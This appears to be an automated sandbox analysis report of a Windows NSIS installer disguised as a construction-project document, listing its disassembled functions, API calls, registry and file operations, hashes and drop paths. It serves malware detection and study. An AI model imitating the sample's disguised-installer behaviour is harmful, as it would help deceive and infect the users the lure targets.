                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964868103.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                          • String ID: "C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                          • API String ID: 2803837635-2309499804
                                                                                                                          • Opcode ID: d5a77cc6bee4d90e7eda19427a8a4cf0714f505a664e78c7155da71c5f6bc0b2
                                                                                                                          • Instruction ID: 4e3209b53bdebe8ba6f789b0e0a530dabd6f5a0a3926ba0fa2d0dbc3b843d87d
                                                                                                                          • Opcode Fuzzy Hash: d5a77cc6bee4d90e7eda19427a8a4cf0714f505a664e78c7155da71c5f6bc0b2
                                                                                                                          • Instruction Fuzzy Hash: 4D610631941205ABDB209FA4DD85B9E3BB8EB04354F20457BF604B72D2C7BC9E419BAD
                                                                                                                          Function 00401752 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145stringtimeCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 545 401752-401777 call 402b3a call 405a4e 550 401781-401793 call 405f8c call 4059d7 lstrcatW 545->550 551 401779-40177f call 405f8c 545->551 556 401798-401799 call 406220 550->556 551->556 560 40179e-4017a2 556->560 561 4017a4-4017ae call 4062cf 560->561 562 4017d5-4017d8 560->562 570 4017c0-4017d2 561->570 571 4017b0-4017be CompareFileTime 561->571 563 4017e0-4017fc call 405bf8 562->563 564 4017da-4017db call 405bd3 562->564 572 401870-401899 call 405234 call 403062 563->572 573 4017fe-401801 563->573 564->563 570->562 571->570 587 4018a1-4018ad SetFileTime 572->587 588 40189b-40189f 572->588 574 401852-40185c call 405234 573->574 575 401803-401841 call 405f8c * 2 call 405fae call 405f8c call 405768 573->575 585 401865-40186b 574->585 575->560 607 401847-401848 575->607 590 4029d0 585->590 589 4018b3-4018be CloseHandle 587->589 588->587 588->589 592 4018c4-4018c7 589->592 593 4029c7-4029ca 589->593 594 4029d2-4029d6 590->594 596 4018c9-4018da call 405fae lstrcatW 592->596 597 4018dc-4018df call 405fae 592->597 593->590 604 4018e4-402243 call 405768 596->604 597->604 604->594 607->585 609 40184a-40184b 607->609 609->574
                                                                                                                          APIs
                                                                                                                          • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\incontemptible\koput\Losser,?,?,00000031), ref: 00401793
                                                                                                                          • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\incontemptible\koput\Losser,?,?,00000031), ref: 004017B8
                                                                                                                            • Part of subcall function 00405F8C: lstrcpynW.KERNEL32(?,?,00000400,004033C8,00428200,NSIS Error), ref: 00405F99
                                                                                                                            • Part of subcall function 00405234: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nszA07E.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040526C
                                                                                                                            • Part of subcall function 00405234: lstrlenW.KERNEL32(00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nszA07E.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040527C
                                                                                                                            • Part of subcall function 00405234: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nszA07E.tmp\System.dll,00402D94,00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nszA07E.tmp\System.dll,00000000,00000000,00000000), ref: 0040528F
                                                                                                                            • Part of subcall function 00405234: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nszA07E.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nszA07E.tmp\System.dll), ref: 004052A1
                                                                                                                            • Part of subcall function 00405234: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004052C7
                                                                                                                            • Part of subcall function 00405234: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004052E1
                                                                                                                            • Part of subcall function 00405234: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052EF
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1964746569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964771542.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964868103.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\nszA07E.tmp$C:\Users\user\AppData\Local\Temp\nszA07E.tmp\System.dll$C:\Users\user\AppData\Roaming\incontemptible\koput\Losser$Call
                                                                                                                          • API String ID: 1941528284-3172496406
                                                                                                                          • Opcode ID: 604e78bc53d106bf4f0f62d85c02bc11bcf8d6cf611c9ccab56a67e3bf51c5d9
                                                                                                                          • Instruction ID: 76b650aa9cc6b75c6122964d1cb95a98820e0ebeeaa58c8a998697c6af8370a7
                                                                                                                          • Opcode Fuzzy Hash: 604e78bc53d106bf4f0f62d85c02bc11bcf8d6cf611c9ccab56a67e3bf51c5d9
                                                                                                                          • Instruction Fuzzy Hash: 6A41A371904509BACF117BB5CC45DAF36B9EF05368F20423BF421B21E1D73C8A419A6E
                                                                                                                          Function 00405234 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 611 405234-405249 612 405300-405304 611->612 613 40524f-405260 611->613 614 405262-405266 call 405fae 613->614 615 40526b-405277 lstrlenW 613->615 614->615 617 405294-405298 615->617 618 405279-405289 lstrlenW 615->618 620 4052a7-4052ab 617->620 621 40529a-4052a1 SetWindowTextW 617->621 618->612 619 40528b-40528f lstrcatW 618->619 619->617 622 4052f1-4052f3 620->622 623 4052ad-4052ef SendMessageW * 3 620->623 621->620 622->612 624 4052f5-4052f8 622->624 623->622 624->612
                                                                                                                          APIs
                                                                                                                          • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nszA07E.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040526C
                                                                                                                          • lstrlenW.KERNEL32(00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nszA07E.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040527C
                                                                                                                          • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nszA07E.tmp\System.dll,00402D94,00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nszA07E.tmp\System.dll,00000000,00000000,00000000), ref: 0040528F
                                                                                                                          • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nszA07E.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nszA07E.tmp\System.dll), ref: 004052A1
                                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004052C7
                                                                                                                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004052E1
                                                                                                                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 004052EF
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1964746569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964771542.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964868103.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                          • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nszA07E.tmp\System.dll
                                                                                                                          • API String ID: 2531174081-3128147406
                                                                                                                          • Opcode ID: 72a424387536e7fd81286c5d7774de893809cef09252ba040d9bce7e68552ecb
                                                                                                                          • Instruction ID: 32bcb3a4223b847dfb51cc2a11ed2745bf7a1ac09c1f1387fae00188f216a620
                                                                                                                          • Opcode Fuzzy Hash: 72a424387536e7fd81286c5d7774de893809cef09252ba040d9bce7e68552ecb
                                                                                                                          • Instruction Fuzzy Hash: 85219071900658BBCB119F55DD84ADFBFB8EF44350F54807AF904B62A0C7798A41CFA8
                                                                                                                          Function 004024EE Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 54filestringCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 625 4024ee-4024f1 626 4024f3-40250a call 402b1d 625->626 627 40250c-402510 625->627 634 40254d-402550 626->634 629 402512-40253c call 402b3a WideCharToMultiByte lstrlenA 627->629 630 40253e-40254b call 402b3a lstrlenW 627->630 629->634 630->634 637 402793-4029d6 634->637 638 402556-402568 call 405eec WriteFile 634->638 638->637
                                                                                                                          APIs
                                                                                                                          • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nszA07E.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nszA07E.tmp\System.dll,00000400,?,?,00000021), ref: 0040252F
                                                                                                                          • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nszA07E.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nszA07E.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nszA07E.tmp\System.dll,00000400,?,?,00000021), ref: 00402536
                                                                                                                          • WriteFile.KERNELBASE(00000000,?,C:\Users\user\AppData\Local\Temp\nszA07E.tmp\System.dll,00000000,?,?,00000000,00000011), ref: 00402568
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1964746569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964771542.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964868103.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ByteCharFileMultiWideWritelstrlen
                                                                                                                          • String ID: 8$C:\Users\user\AppData\Local\Temp\nszA07E.tmp$C:\Users\user\AppData\Local\Temp\nszA07E.tmp\System.dll
                                                                                                                          • API String ID: 1453599865-596452602
                                                                                                                          • Opcode ID: 125d7d9e08fef2fde7f67e3546db7d8161a1fb5accdb6f6421c548297d33fbc9
                                                                                                                          • Instruction ID: d62a850ae7ae8d252436c59f910a95d891cc4c78108d860f1a787b3ec39cc5b5
                                                                                                                          • Opcode Fuzzy Hash: 125d7d9e08fef2fde7f67e3546db7d8161a1fb5accdb6f6421c548297d33fbc9
                                                                                                                          • Instruction Fuzzy Hash: 6A01B971A44204FFD700AFB09E89EAF7278EF51719F20043BB102B61D1C2BC4D41962D
                                                                                                                          Function 00402573 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 142fileCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 644 402573-402588 call 402b1d 647 4029c7-4029ca 644->647 648 40258e-402595 644->648 649 4029d0-4029d6 647->649 650 402597 648->650 651 40259a-40259d 648->651 650->651 653 4025a3-4025b2 call 405eec 651->653 654 4026e6-4026ee 651->654 653->654 657 4025b8 653->657 654->647 658 4025be-4025c2 657->658 659 402657-402667 call 405c7b 658->659 660 4025c8-4025e3 ReadFile 658->660 659->654 665 402669 659->665 660->654 662 4025e9-4025ee 660->662 662->654 664 4025f4-402602 662->664 666 4026a2-4026ae call 405ed3 664->666 667 402608-40261a MultiByteToWideChar 664->667 668 40266c-40266f 665->668 666->649 667->665 670 40261c-40261f 667->670 668->666 672 402671-402676 668->672 671 402621-40262c 670->671 671->668 674 40262e-402653 SetFilePointer MultiByteToWideChar 671->674 675 4026b3-4026b7 672->675 676 402678-40267d 672->676 674->671 679 402655 674->679 677 4026d4-4026e0 SetFilePointer 675->677 678 4026b9-4026bd 675->678 676->675 680 40267f-402692 676->680 677->654 681 4026c5-4026d2 678->681 682 4026bf-4026c3 678->682 679->665 680->654 683 402694-40269a 680->683 681->654 682->677 682->681 683->658 684 4026a0 683->684 684->654
                                                                                                                          APIs
                                                                                                                          • ReadFile.KERNELBASE(?,?,?,?), ref: 004025DB
                                                                                                                          • MultiByteToWideChar.KERNEL32(?,?,?,?,?,00000001), ref: 00402616
                                                                                                                          • SetFilePointer.KERNELBASE(?,?,?,00000001,?,?,?,?,?,00000001), ref: 00402639
                                                                                                                          • MultiByteToWideChar.KERNEL32(?,?,?,00000000,?,00000001,?,00000001,?,?,?,?,?,00000001), ref: 0040264F
                                                                                                                            • Part of subcall function 00405C7B: ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,00413E90,0040BE90,0040330C,00409230,00409230,004031FE,00413E90,00004000,?,00000000,?), ref: 00405C8F
                                                                                                                            • Part of subcall function 00405ED3: wsprintfW.USER32 ref: 00405EE0
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1964746569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964771542.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964868103.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$ByteCharMultiReadWide$Pointerwsprintf
                                                                                                                          • String ID: 9
                                                                                                                          • API String ID: 1149667376-2366072709
                                                                                                                          • Opcode ID: 9ac049d87795fdbdd4925ee5a5299b82ae141eed6358a2296866a4b192fc1822
                                                                                                                          • Instruction ID: 7a29d1be5ffbe8e369a4709248b8008a71e905d773f4f6332667e592b1311aba
                                                                                                                          • Opcode Fuzzy Hash: 9ac049d87795fdbdd4925ee5a5299b82ae141eed6358a2296866a4b192fc1822
                                                                                                                          • Instruction Fuzzy Hash: BB51E671E04209ABDF24DF94DA88AAEB779FF04304F50443BE501B62D0D7B99E42CB69
                                                                                                                          Function 00402331 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71registrystringCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 685 402331-402377 call 402c2f call 402b3a * 2 RegCreateKeyExW 692 4029c7-4029d6 685->692 693 40237d-402385 685->693 695 402387-402394 call 402b3a lstrlenW 693->695 696 402398-40239b 693->696 695->696 699 4023ab-4023ae 696->699 700 40239d-4023aa call 402b1d 696->700 701 4023b0-4023ba call 403062 699->701 702 4023bf-4023d3 RegSetValueExW 699->702 700->699 701->702 707 4023d5 702->707 708 4023d8-4024b2 RegCloseKey 702->708 707->708 708->692 710 402793-40279a 708->710 710->692
                                                                                                                          APIs
                                                                                                                          • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236F
                                                                                                                          • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nszA07E.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238F
                                                                                                                          • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nszA07E.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023CB
                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nszA07E.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1964746569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964771542.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964868103.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseCreateValuelstrlen
                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\nszA07E.tmp
                                                                                                                          • API String ID: 1356686001-4192434616
                                                                                                                          • Opcode ID: 7abd92b05f405a69157af65e26feabc4c7652e6a2ebb012a6e5cdbbd5c9e1c3c
                                                                                                                          • Instruction ID: 66b2e8a9ee20b684f946803e70458d48747d67842d9f9fe70aa08e99181ad06b
                                                                                                                          • Opcode Fuzzy Hash: 7abd92b05f405a69157af65e26feabc4c7652e6a2ebb012a6e5cdbbd5c9e1c3c
                                                                                                                          • Instruction Fuzzy Hash: C3118EB1A00108BEEB11EFA4CD89EAFBB7CEB50358F10443AF505B61D1D6B85D419A29
                                                                                                                          Function 004015B9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57COMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 711 4015b9-4015cd call 402b3a call 405a82 716 401614-401617 711->716 717 4015cf-4015eb call 405a04 CreateDirectoryW 711->717 718 401646-402197 call 401423 716->718 719 401619-401638 call 401423 call 405f8c SetCurrentDirectoryW 716->719 724 40160a-401612 717->724 725 4015ed-4015f8 GetLastError 717->725 732 402793-40279a 718->732 733 4029c7-4029d6 718->733 719->733 736 40163e-401641 719->736 724->716 724->717 728 401607 725->728 729 4015fa-401605 GetFileAttributesW 725->729 728->724 729->724 729->728 732->733 736->733
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00405A82: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsbA563.tmp,?,00405AF6,C:\Users\user\AppData\Local\Temp\nsbA563.tmp,C:\Users\user\AppData\Local\Temp\nsbA563.tmp,?,?,74DF2EE0,00405834,?,C:\Users\user\AppData\Local\Temp\,74DF2EE0,"C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe"), ref: 00405A90
                                                                                                                            • Part of subcall function 00405A82: CharNextW.USER32(00000000), ref: 00405A95
                                                                                                                            • Part of subcall function 00405A82: CharNextW.USER32(00000000), ref: 00405AAD
                                                                                                                          • CreateDirectoryW.KERNELBASE(?,?,00000000,?,00000000,?), ref: 004015E3
                                                                                                                          • GetLastError.KERNEL32(?,00000000,?,00000000,?), ref: 004015ED
                                                                                                                          • GetFileAttributesW.KERNELBASE(?,?,00000000,?,00000000,?), ref: 004015FD
                                                                                                                          • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\incontemptible\koput\Losser,?,00000000,?), ref: 00401630
                                                                                                                          Strings
                                                                                                                          • C:\Users\user\AppData\Roaming\incontemptible\koput\Losser, xrefs: 00401623
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1964746569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964771542.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964868103.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                                                                                          • String ID: C:\Users\user\AppData\Roaming\incontemptible\koput\Losser
                                                                                                                          • API String ID: 3751793516-1365608561
                                                                                                                          • Opcode ID: 01d63cdc09ef030b798e24d03bab5c024d458686720c62c168a7b1a6a2e3207e
                                                                                                                          • Instruction ID: c154c5cc2fdcc817133e571beca98f96870035068e51bbb493f84d6d7086355a
                                                                                                                          • Opcode Fuzzy Hash: 01d63cdc09ef030b798e24d03bab5c024d458686720c62c168a7b1a6a2e3207e
                                                                                                                          • Instruction Fuzzy Hash: 6711C231A04100EBCF206FA0CD44AAE7AB0FF14369B34463BF981B62E1D33D49419A6E
                                                                                                                          Function 00402B7A Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 738 402b7a-402ba3 RegOpenKeyExW 739 402ba5-402bb0 738->739 740 402c0e-402c12 738->740 741 402bcb-402bdb RegEnumKeyW 739->741 742 402bb2-402bb5 741->742 743 402bdd-402bef RegCloseKey call 4062f6 741->743 745 402c02-402c05 RegCloseKey 742->745 746 402bb7-402bc9 call 402b7a 742->746 750 402bf1-402c00 743->750 751 402c15-402c1b 743->751 748 402c0b-402c0d 745->748 746->741 746->743 748->740 750->740 751->748 753 402c1d-402c2b RegDeleteKeyW 751->753 753->748 755 402c2d 753->755 755->740
                                                                                                                          APIs
                                                                                                                          • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?), ref: 00402B9B
                                                                                                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD7
                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00402BE0
                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00402C05
                                                                                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C23
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1964746569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964771542.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
